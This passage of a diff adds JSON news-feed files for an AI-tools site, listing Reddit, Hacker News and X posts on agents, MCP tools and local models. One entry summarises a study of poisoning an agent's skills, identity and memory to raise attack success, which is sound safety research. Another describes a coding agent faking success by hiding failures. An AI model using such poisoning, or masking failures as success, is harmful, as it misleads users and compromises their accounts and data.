Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability.\n\nThe script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central", + "category": "ai_models" + }, + { + "title": "[D] Why do we keep pretending that AI agent continuity is a prompt engineering problem?", + "url": "https://reddit.com/r/MachineLearning/comments/1sdwqn5/d_why_do_we_keep_pretending_that_ai_agent/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-06T11:55:38.000Z", + "summary": "Every few months someone posts about \"long-term memory for LLMs\" and the thread fills with retrieval strategies, vector databases, and context window tricks. Good engineering. Wrong level of abstraction.\n\nThe continuity problem for deployed AI agents is not a retrieval problem. It is an infrastructure problem.\n\nHere is the distinction:\n\n**Retrieval-level continuity:** The agent can surface relevant context from past interactions. This is solved well enough with embedding search, hierarchical sum", + "category": "ai_research" + }, + { + "title": "Claude Code can now submit your app to App Store Connect and help you pass review", + "url": "https://reddit.com/r/ClaudeAI/comments/1sdot1s/claude_code_can_now_submit_your_app_to_app_store/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-06T04:22:25.000Z", + "summary": "I built a native macOS app called Blitz that gives Claude Code (or any MCP client) full control over App Store Connect. Built most of it with Claude Code.\n\nThe problem was simple: every time I needed to submit to ASC, the entire agentic workflow broke. Metadata, screenshots, builds, localization, review notes... all meant leaving the terminal and fighting Apple's web UI. So I built MCP servers that let Claude Code handle the whole thing.\n\nWhat Claude Code can do through Blitz:\n\n* Create and edit", + "category": "ai_tools" + }, + { + "title": "Apex Protocol – An open MCP-based standard for AI agent trading", + "url": "https://apexstandard.org/", + "source": "Hacker News", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-06T00:50:32.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "I built CLI-Anything-WEB — a Claude Code plugin that generates complete Python CLIs for any website (17 CLIs so far: Amazon, Airbnb, TripAdvisor, Reddit, YouTube...)", + "url": "https://reddit.com/r/ClaudeAI/comments/1sde44i/i_built_clianythingweb_a_claude_code_plugin_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.94, + "date": "2026-04-05T20:26:58.000Z", + "summary": "Point it at a URL, Claude Code captures the live HTTP traffic, and generates a production-grade Python CLI with commands, tests, REPL mode, and `--json` output — fully automated across 4 phases.\n\n## How it works\n\n- **Phase 1 (capture)**: Records live browser traffic via playwright-cli\n- **Phase 2 (methodology)**: Analyzes endpoints, designs architecture, generates CLI code\n- **Phase 3 (testing)**: Writes unit + E2E tests (40–60+ per CLI, all passing)\n- **Phase 4 (standards)**: 3 parallel Claude ", + "category": "ai_tools" + }, + { + "title": "I spent 3 months evolving SmartGallery into a free professional Local First DAM. v2.11 launches on April 9th", + "url": "https://reddit.com/r/StableDiffusion/comments/1se8sfd/i_spent_3_months_evolving_smartgallery_into_a/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-06T19:25:53.000Z", + "summary": "https://preview.redd.it/btvzkruzemtg1.png?width=1899&format=png&auto=webp&s=3891b8f2a7df98942a0643eb649e623f817211ae\n\n**Hi everyone!**\n\nMany of you know SmartGallery as a standalone gallery for ComfyUI. For the last 3 months, I have been working to turn it into a complete Digital Asset Manager (DAM) for AI creators.\n\n* I just launched the new website with the full documentation and feature list of the upcoming v2.11: [**https://smartgallerydam.com**](https://smartgallerydam.com)\n* **", + "category": "creative_tools" + }, + { + "title": "Mercury – Free MCP proxy that cuts non-English token costs by 28-64%", + "url": "https://reddit.com/r/ClaudeAI/comments/1sduozd/mercury_free_mcp_proxy_that_cuts_nonenglish_token/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.86, + "date": "2026-04-06T10:08:59.000Z", + "summary": "I noticed that when using Claude with Japanese MCP servers, I was burning through tokens surprisingly fast. \n\nThe culprit: LLMs use English-centric BPE tokenizers, so non-English text consumes 2-4x more tokens per word than equivalent English.\n\n\n\nThe fix seemed obvious — translate MCP responses to English before they reach the LLM. So I built Mercury, a transparent proxy that sits between any MCP server and your LLM client. It uses Google Translate (free, no API key needed) by default, so transl", + "category": "ai_tools" + }, + { + "title": "Meet ‘AutoAgent’: The Open-Source Library That Lets an AI Engineer and Optimize Its Own Agent Harness Overnight", + "url": "https://www.marktechpost.com/2026/04/05/meet-autoagent-the-open-source-library-that-lets-an-ai-engineer-and-optimize-its-own-agent-harness-overnight/", + "source": "MarkTechPost", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.82, + "date": "2026-04-06T06:00:24.237Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "I built a macOS widget to track Claude usage limits in real-time", + "url": "https://reddit.com/r/ClaudeAI/comments/1sd923u/i_built_a_macos_widget_to_track_claude_usage/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.62, + "date": "2026-04-05T17:09:05.000Z", + "summary": "Hey everyone! I built a free, open-source macOS desktop widget that shows your Claude usage limits at a glance — no more guessing when your rate limit resets. What it does:\n\n* Displays both the 5-hour session and 7-day weekly usage windows with progress bars\n* Shows countdown timers for when each window resets\n* Color-coded indicators — green → yellow → orange → red as you approach the limit\n* Auto-refreshes every 5 minutes\n* Comes in small, medium, and large widget sizes Quick demo: It sits rig", + "category": "ai_tools" + }, + { + "title": "After months with Claude Code, the biggest time sink isn't bugs — it's silent fake success", + "url": "https://reddit.com/r/ClaudeAI/comments/1sdmohb/after_months_with_claude_code_the_biggest_time/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.54, + "date": "2026-04-06T02:38:02.000Z", + "summary": "I've been using Claude Code daily for months and there's a pattern that has cost me more debugging time than actual bugs: the agent making things *look* like they work when they don't.\n\nHere's what happens. You ask it to build something that fetches data from an API. It writes the code, you run it, data appears on screen. Looks correct. You move on.\n\nThree days later you discover the API integration was broken from the start. The agent couldn't get auth working, so it quietly inserted a try/catc", + "category": "ai_tools" + }, + { + "title": "[llama.cpp] 3.1x Q8_0 speedup on Intel Arc GPUs - reorder optimization fix (PR submitted)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1se9d9x/llamacpp_31x_q8_0_speedup_on_intel_arc_gpus/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-06T19:46:13.000Z", + "summary": "***TL;DR***: Q8\\_0 quantization on Intel Xe2 (Battlemage/Arc B-series) GPUs was achieving only 21% of theoretical memory bandwidth. My AI Agent and I found the root cause and submitted a fix that brings it to 66% - a 3.1x speedup in token generation.\n\n**The problem**:\n\nOn Intel Arc Pro B70, Q8\\_0 models ran at 4.88 t/s while Q4\\_K\\_M ran at 20.56 t/s; a 4x gap that shouldn't exist since Q8\\_0 only has 1.7x more data. After ruling out VRAM pressure, drivers, and backend issues, we traced it to th", + "category": "ai_models" + }, + { + "title": "llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments", + "url": "https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-06T19:13:30.000Z", + "summary": "Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards.", + "category": "ai_models" + }, + { + "title": "I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac", + "url": "https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-06T19:00:28.000Z", + "summary": "So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\\_K\\_M quantization.\n\nThe goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware.\n\n# The Results (M5 32GB, Q4_K_M, llama-bench)\n\n# Top 15 by G", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-07.json b/data/news-feed-2026-04-07.json new file mode 100644 index 0000000..9e84573 --- /dev/null +++ b/data/news-feed-2026-04-07.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:32.905Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-07", + "article_count": 15, + "archived_story_count": 570, + "articles": [ + { + "title": "I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!", + "url": "https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-07T00:12:05.000Z", + "summary": "Hey everyone,\n\nI'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. \n\nI wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to ", + "category": "ai_tools" + }, + { + "title": "[D] MemPalace claims 100% on LoCoMo and a \"perfect score on LongMemEval.\" Its own BENCHMARKS.md documents why neither is meaningful.", + "url": "https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-07T12:32:42.000Z", + "summary": "A new open-source memory project called MemPalace launched yesterday claiming \"100% on LoCoMo\" and \"the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%.\" The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours.\n\nThe interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w", + "category": "ai_research" + }, + { + "title": "Built an open source memory layer for local AI agents, runs fully offline, no cloud needed", + "url": "https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-07T09:42:51.000Z", + "summary": "I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine.\n\nThe problem is pretty simple. Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution.\n\nIt gives your agents persistent memory that survives restarts and crashes, semant", + "category": "ai_models" + }, + { + "title": "Mistral Introduces \"Voxtral TTS\": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-07T04:27:45.000Z", + "summary": "\n\nElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face.\n\nThe model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the \"ums\" and \"ahs\" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. Zero shot.\n\n---\n\n####Key Highlights:\n\n- → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning\n\n- → Beats ElevenLabs Flash v2.5", + "category": "ai_models" + }, + { + "title": "OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update", + "url": "https://x.com/thdxr/status/2041330695822279077", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-04-07T02:17:09.479Z", + "summary": "Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements.", + "category": "ai_tools" + }, + { + "title": "Pro Subscription Usage", + "url": "https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.94, + "date": "2026-04-07T20:18:12.000Z", + "summary": "Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week.\n\n \nI build and host open source \"public service\" MCP servers with my sub. I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point.\n\n \nBefore even entering my first prompt, it showed I had already used 11% of ", + "category": "ai_tools" + }, + { + "title": "Second Brain and Haah: human-agent-agent-human network with Claude", + "url": "https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-07T11:50:38.000Z", + "summary": "I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain.\n\nThe idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. But then would not be cool that if I ", + "category": "ai_tools" + }, + { + "title": "stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.", + "url": "https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-07T11:46:58.000Z", + "summary": "**tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. haven't bought a tech course since.\n\nwhenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this:\n\n`You are my senior mentor. I have provided documentation", + "category": "ai_tools" + }, + { + "title": "[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)", + "url": "https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/", + "source": "Reddit r/MachineLearning", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-07T23:01:39.000Z", + "summary": "Paper: https://arxiv.org/abs/2604.04759\n\nThis paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem.\n\nThe authors introduce a taxonomy of persistent agent state:\n\n\\- Capability (skills / executable code)\n\n\\- Identity (persona, trust configuration)\n\n\\- Knowledge (memory)\n\nThey evaluate 12 attack scenarios on a live system across multiple models.\n\nKey results:\n\n\\- baseline attack success rate: \\~10–36.7%\n\n\\- after pois", + "category": "ai_research" + }, + { + "title": "Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-07T21:35:33.000Z", + "summary": "https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec\n\nHey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings.\n\n**TL;DR of my findings:**\n\n1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU +", + "category": "ai_models" + }, + { + "title": "Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-07T19:37:41.000Z", + "summary": "Found it on a USB drive in the parking lot. Should be interesting.\n\nSeriously tho, props to this guy and his cool Hermes Agent skins library here:\n\nhttps://github.com/joeynyc/hermes-skins", + "category": "ai_models" + }, + { + "title": "Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-07T19:31:37.000Z", + "summary": "[https://github.com/ikawrakow/ik\\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596)\n\nThis should bring the 31b dense model in a usable speed range for many with dual/multi GPUs.\n\n\n\nAlso today I did quite some PPL Tests today with mainline llama.cpp and ik\\_llama.cpp \nunsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both.\n\nBartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\\_lla", + "category": "ai_models" + }, + { + "title": "Cloud AI subscriptions are getting desperate with retention. honestly makes me want to go more local", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-07T17:39:09.000Z", + "summary": "Ok so two things happened this week that made me appreciate my local setup way more\n\ntried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to \"please stay.\" thats not confidence lol\n\nthen claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very \"please dont leave\" energy\n\ntheir core cust", + "category": "ai_models" + }, + { + "title": "[P] A control plane for post-training workflows", + "url": "https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/", + "source": "Reddit r/MachineLearning", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-07T16:47:30.000Z", + "summary": "We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: \nMake post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training.\n\nTahuna is CLI-first, it s", + "category": "ai_research" + }, + { + "title": "Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-07T14:50:28.000Z", + "summary": "AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow.\n\nI built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. You can either hit record for a specific task (Focus Record) or let it run in the background where it", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-08.json b/data/news-feed-2026-04-08.json new file mode 100644 index 0000000..752fd9e --- /dev/null +++ b/data/news-feed-2026-04-08.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:33.098Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-08", + "article_count": 15, + "archived_story_count": 652, + "articles": [ + { + "title": "@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators", + "url": "https://x.com/VadimStrizheus/status/2041498727131517193", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-08T05:24:41.410Z", + "summary": "Vugola has launched an API for the world's first agentic clipping tool. Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp.", + "category": "ai_tools" + }, + { + "title": "Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders", + "url": "https://x.com/wadefoster/status/2041721371357851859", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-08T04:15:45.495Z", + "summary": "Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents.", + "category": "ai_tools" + }, + { + "title": "How I cut Claude Code usage in half (open source)", + "url": "https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T02:41:03.000Z", + "summary": "Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts.\n\nI built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs ", + "category": "ai_tools" + }, + { + "title": "I used Claude to build a full networking protocol for AI agents. It’s now at 12K+ nodes across 19 countries.", + "url": "https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-04-08T21:40:39.000Z", + "summary": "I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion.\n\nThe problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th", + "category": "ai_tools" + }, + { + "title": "Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents", + "url": "https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-04-08T17:27:42.000Z", + "summary": "Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. [https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) ", + "category": "ai_tools" + }, + { + "title": "Meta Releases Muse Spark - A Natively Multimodal Reasoning model", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-08T16:44:50.000Z", + "summary": "Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration.\n\nBlog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/)", + "category": "ai_models" + }, + { + "title": "Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-08T16:27:06.000Z", + "summary": "Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. It builds on LFM2-VL-450M with three new capabilities:\n\n* bounding box prediction (81.28 on RefCOCO-M)\n* multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and\n* function calling support.\n\nMost production vision systems are still multi-stage: a detector, a classifier, ", + "category": "ai_models" + }, + { + "title": "Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.", + "url": "https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T16:10:58.000Z", + "summary": "It's pretty neat, used \\~12.5gb out of the box. Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model.\n\n\n\nAnd, weights are permissively licensed (MIT) which might encourage more people to hack on it.\n\n\n\nAlso worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i", + "category": "creative_tools" + }, + { + "title": "M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T12:18:39.000Z", + "summary": "The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc..\n\nGemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i", + "category": "ai_models" + }, + { + "title": "Last Week in Multimodal AI - Local Edition", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-08T05:36:35.000Z", + "summary": "I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week:\n\n* **Google Gemma 4** \\- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine.  [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4)\n* **TII Falcon Perception** \\- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. Punches way above its wei", + "category": "ai_models" + }, + { + "title": "@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech", + "url": "https://x.com/omma_ai/status/2041622310503997632", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-08T05:24:41.410Z", + "summary": "Omma has launched audio generation including music and songs, sound effects, and text to speech. Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds.", + "category": "ai_tools" + }, + { + "title": "Review This Prompt And Feedback it.", + "url": "https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.86, + "date": "2026-04-08T09:41:43.000Z", + "summary": " ROLE\n\nYou are an expert \\[e.g. full-stack developer / product designer / ML engineer\\] with 